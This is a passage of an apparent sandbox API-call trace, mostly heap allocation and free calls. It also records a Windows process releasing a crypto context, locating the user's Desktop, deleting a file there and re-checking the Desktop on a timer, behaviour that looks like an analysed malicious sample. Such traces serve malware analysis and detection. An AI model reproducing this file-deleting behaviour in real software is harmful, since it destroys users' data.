hHeap=0x970000) returned 1 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0140.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0140.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0140.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0140.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0140.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0140.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0140.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0140.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0140.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0140.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0140.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0140.268] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0140.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0140.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0140.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0140.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.268] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0140.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0140.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0140.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0140.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0140.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0140.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0140.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0140.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0140.271] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0140.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0140.271] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0140.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.271] FreeLibrary (hLibModule=0x756e0000) returned 1 [0140.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.272] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0140.272] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0140.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0140.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0140.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0140.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0140.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0140.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0140.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.273] CloseHandle (hObject=0x2d0) returned 1 [0140.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0140.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0140.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f05008 | out: hHeap=0x970000) returned 1 [0140.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0140.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0140.275] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0140.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0140.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0140.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0140.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0140.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0140.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0140.276] CloseHandle (hObject=0x2a0) returned 1 [0140.357] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0140.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0140.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0140.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0140.364] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0140.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0140.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0140.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0140.367] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0140.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0140.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0140.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0140.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0140.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0140.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0140.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0140.368] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/cggtx8L.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\cggtx8L.gif", lpFilePart=0x8cedf4*="cggtx8L.gif") returned 0x23 [0140.368] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cggtx8L.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\cggtx8l.gif")) returned 0x20 [0140.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cggtx8L.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51db5a40, ftCreationTime.dwHighDateTime=0x1d5e82d, ftLastAccessTime.dwLowDateTime=0x3f99d420, ftLastAccessTime.dwHighDateTime=0x1d5eea8, ftLastWriteTime.dwLowDateTime=0x3f99d420, ftLastWriteTime.dwHighDateTime=0x1d5eea8, nFileSizeHigh=0x0, nFileSizeLow=0x2a7d, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="cggtx8L.gif", cAlternateFileName="")) returned 0xa87050 [0140.380] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cggtx8L.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\cggtx8l.gif")) returned 1 [0140.543] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51db5a40, ftCreationTime.dwHighDateTime=0x1d5e82d, ftLastAccessTime.dwLowDateTime=0x3f99d420, ftLastAccessTime.dwHighDateTime=0x1d5eea8, ftLastWriteTime.dwLowDateTime=0x3f99d420, ftLastWriteTime.dwHighDateTime=0x1d5eea8, nFileSizeHigh=0x0, nFileSizeLow=0x2a7d, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="cggtx8L.gif", cAlternateFileName="")) returned 0 [0140.543] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0140.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0140.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0140.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0140.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0140.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0140.544] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0140.635] TranslateMessage (lpMsg=0x8cf968) returned 0 [0140.635] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0140.635] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0140.636] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0140.636] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0140.636] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0140.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0140.636] 